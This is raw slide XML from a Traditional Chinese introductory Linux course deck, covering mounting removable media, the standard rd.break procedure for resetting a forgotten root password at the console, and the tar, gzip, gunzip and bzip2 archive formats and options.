              <a:t>光碟</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="73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23528" y="1484784"/>
            <a:ext cx="8535066" cy="3744416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911240" y="660240"/>
              <a:ext cx="4737600" cy="108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95400" y="596880"/>
                <a:ext cx="4769280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2063880" y="2203560"/>
              <a:ext cx="260640" cy="194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48040" y="2139840"/>
                <a:ext cx="292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2400480" y="2197080"/>
              <a:ext cx="628920" cy="38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84280" y="2133720"/>
                <a:ext cx="6609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3242452" y="2184480"/>
              <a:ext cx="2318040" cy="38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226612" y="2121120"/>
                <a:ext cx="234972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1467000" y="2368440"/>
              <a:ext cx="3105360" cy="51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450800" y="2305080"/>
                <a:ext cx="3137400" cy="17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4763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掛載隨身碟</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="74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67544" y="1340768"/>
            <a:ext cx="7992888" cy="4843791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574640" y="4197240"/>
              <a:ext cx="1530720" cy="640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58800" y="4133880"/>
                <a:ext cx="15627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2374920" y="4381560"/>
              <a:ext cx="2013120" cy="320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59080" y="4317840"/>
                <a:ext cx="20451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444600" y="5892840"/>
              <a:ext cx="1130400" cy="38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28760" y="5829480"/>
                <a:ext cx="11624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5041800" y="5854680"/>
              <a:ext cx="362520" cy="259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025960" y="5791320"/>
                <a:ext cx="3942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2451240" y="5911920"/>
              <a:ext cx="1403640" cy="64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435400" y="5848200"/>
                <a:ext cx="14353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3968640" y="4356000"/>
              <a:ext cx="52740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952800" y="4292640"/>
                <a:ext cx="5590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5499000" y="4362480"/>
              <a:ext cx="889560" cy="320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83160" y="4299120"/>
                <a:ext cx="9212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4819680" y="4387680"/>
              <a:ext cx="419400" cy="13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803840" y="4324320"/>
                <a:ext cx="45108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1231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oot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>密碼忘記如何還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進入救援模式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>進入開機選單時，選項停留在第一個，然後按</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>”e”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，進入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>救援</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>模式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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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081" y="2996952"/>
            <a:ext cx="5638800" cy="324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322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ot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>密碼忘記如何</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>還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330527"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用鍵盤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>” ↓</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>linux16 /boot/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>vumli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>輸入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>rd.break</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>後，按 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Ctrl + X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>鍵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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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283" y="2564904"/>
            <a:ext cx="6211947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5754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ot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>密碼忘記如何還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402535"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>自動重建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>label(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>autorelabel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sz="2000" dirty="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ount –o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>remount,rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>sysroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>hroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>sysroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>asswd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>touch /.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>autorelabel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>exit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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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6653" y="2708920"/>
            <a:ext cx="5164848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822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pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>六、檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>壓縮、解壓縮與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>打包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
          </a:p>
          <a:p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778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在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>的世界中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>大部分的程式都是以壓縮檔的形式散佈。所以我們常常會看到一些以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>.tar.gz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>tgz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>gz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>.bz2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>為副檔名的檔案。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>這些檔案都是使用各種不同壓縮程式所製作出來的壓縮檔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>我們從網路上取得這樣的檔案之後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>都要先解壓縮才能安裝使用。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簡介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232760" y="2654280"/>
              <a:ext cx="724320" cy="259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16920" y="2590920"/>
                <a:ext cx="7560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946240" y="2660760"/>
              <a:ext cx="3112200" cy="1461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30400" y="2597040"/>
                <a:ext cx="3143880" cy="27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84240" y="2108160"/>
              <a:ext cx="1225800" cy="259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68400" y="2044800"/>
                <a:ext cx="12574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749680" y="2108160"/>
              <a:ext cx="590760" cy="320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33840" y="2044800"/>
                <a:ext cx="6224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422360" y="1644480"/>
              <a:ext cx="36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406520" y="1581120"/>
                <a:ext cx="320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939960" y="1600200"/>
              <a:ext cx="1575000" cy="320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23760" y="1536840"/>
                <a:ext cx="16070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911760" y="1670040"/>
              <a:ext cx="57816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895560" y="1606680"/>
                <a:ext cx="610200" cy="133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2614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/>
              <a:t>.tar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>：以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>tar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指令打包的檔案。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>gz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>：以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指令壓縮的檔案。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>.tar.gz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>tgz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>：以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>tar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指令打包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>再使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指令壓縮的檔案。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>.bz2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>：以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>bzip2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指令壓縮的檔案。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>.tar.bz2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>：以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>tar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指令打包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>再使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>bzip2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指令壓縮的檔案。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 smtClean="0"/>
              <a:t>打包、壓縮副檔名解說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994040" y="711360"/>
              <a:ext cx="990720" cy="3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78200" y="647640"/>
                <a:ext cx="1022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727440" y="622440"/>
              <a:ext cx="52092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711600" y="558720"/>
                <a:ext cx="5529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571840" y="1619280"/>
              <a:ext cx="1206720" cy="129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56000" y="1555920"/>
                <a:ext cx="12384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981600" y="1625760"/>
              <a:ext cx="857520" cy="38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965400" y="1562040"/>
                <a:ext cx="8895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854520" y="1568520"/>
              <a:ext cx="2565720" cy="446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838680" y="1504800"/>
                <a:ext cx="25974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939960" y="1562040"/>
              <a:ext cx="736920" cy="129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23760" y="1498680"/>
                <a:ext cx="7689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952560" y="2209680"/>
              <a:ext cx="540000" cy="385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36720" y="2146320"/>
                <a:ext cx="57168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184640" y="2247840"/>
              <a:ext cx="730440" cy="6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168800" y="2184480"/>
                <a:ext cx="7624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425680" y="2260440"/>
              <a:ext cx="70524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409840" y="2197080"/>
                <a:ext cx="7369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882720" y="2870280"/>
              <a:ext cx="965520" cy="446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66880" y="2806560"/>
                <a:ext cx="9972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682640" y="2857680"/>
              <a:ext cx="1460880" cy="1908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666800" y="2793960"/>
                <a:ext cx="14925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4229280" y="2857680"/>
              <a:ext cx="1962360" cy="446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213080" y="2793960"/>
                <a:ext cx="19944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6902280" y="2863800"/>
              <a:ext cx="1016640" cy="259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886440" y="2800440"/>
                <a:ext cx="10483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806400" y="3308400"/>
              <a:ext cx="2489760" cy="637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90560" y="3244680"/>
                <a:ext cx="252144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2266920" y="3987720"/>
              <a:ext cx="1537200" cy="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2251080" y="3924360"/>
                <a:ext cx="15688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984240" y="4025880"/>
              <a:ext cx="825840" cy="5760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68400" y="3962520"/>
                <a:ext cx="85752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990720" y="4641840"/>
              <a:ext cx="768600" cy="5760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74880" y="4578480"/>
                <a:ext cx="8002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3378240" y="4641840"/>
              <a:ext cx="1727640" cy="68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3362400" y="4578480"/>
                <a:ext cx="1759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5137200" y="4641840"/>
              <a:ext cx="2997360" cy="4500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121360" y="4578480"/>
                <a:ext cx="30294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571680" y="5149800"/>
              <a:ext cx="2000520" cy="3852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555480" y="5086440"/>
                <a:ext cx="20325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565200" y="235080"/>
              <a:ext cx="1092600" cy="99072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49360" y="171360"/>
                <a:ext cx="1124280" cy="1118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600" dirty="0" err="1" smtClean="0"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>指令可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>壓縮</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>解壓縮</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>檔案，無選項參數時執行壓縮操作，壓縮產生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>後附檔名為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>gz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>壓縮檔案，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>並刪除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>源檔案。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean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gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> 【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>選項</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/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d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>壓縮檔案，相當於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>gunzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>指令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>顯示檔案的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>壓縮比例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400" dirty="0" err="1"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>壓縮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4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58680" y="4476600"/>
              <a:ext cx="635400" cy="514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2840" y="4413240"/>
                <a:ext cx="66708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019240" y="4432320"/>
              <a:ext cx="1568880" cy="38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03400" y="4368960"/>
                <a:ext cx="16005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07920" y="1600200"/>
              <a:ext cx="4640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92080" y="1536840"/>
                <a:ext cx="4957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308240" y="1650960"/>
              <a:ext cx="432000" cy="38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92400" y="1587600"/>
                <a:ext cx="46368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835280" y="1638360"/>
              <a:ext cx="193068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819440" y="1574640"/>
                <a:ext cx="19623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321000" y="1593720"/>
              <a:ext cx="2934000" cy="450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305160" y="1530360"/>
                <a:ext cx="29656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901800" y="3282840"/>
              <a:ext cx="2057760" cy="766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85960" y="3219480"/>
                <a:ext cx="208944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558880" y="3263760"/>
              <a:ext cx="1734120" cy="13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543040" y="3200400"/>
                <a:ext cx="17658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3822840" y="3282840"/>
              <a:ext cx="1670400" cy="450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807000" y="3219480"/>
                <a:ext cx="17020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5708520" y="3308400"/>
              <a:ext cx="99756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692680" y="3244680"/>
                <a:ext cx="102924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594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Linux/FreeBSD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dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux和FreeBSD都是將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>移植到PC上的解決方案，並且採用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>開放原始碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的方式進行推廣。其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>指令大部分皆與UNIX相同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，使得一般無法購買工作站及大型主機的使用者，也能享有UNIX的穩定性。這類作業系統通稱為UNIX-LIKE作業系統。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just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3121920" y="1515240"/>
              <a:ext cx="875880" cy="3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106080" y="1451880"/>
                <a:ext cx="9075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7530840" y="1613160"/>
              <a:ext cx="114984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15000" y="1549800"/>
                <a:ext cx="11815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86400" y="1548000"/>
              <a:ext cx="1084320" cy="198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70560" y="1484280"/>
                <a:ext cx="111600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370960" y="1541520"/>
              <a:ext cx="148968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355120" y="1477800"/>
                <a:ext cx="15213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298320" y="4023360"/>
              <a:ext cx="1633320" cy="525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82480" y="3960000"/>
                <a:ext cx="1665000" cy="17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7502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gunzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指令用於執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指令的逆操作，執行解壓縮，並將壓縮後的檔案還原到原始檔案，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> -d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指令也可完成解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>壓縮。</a:t>
            </a:r>
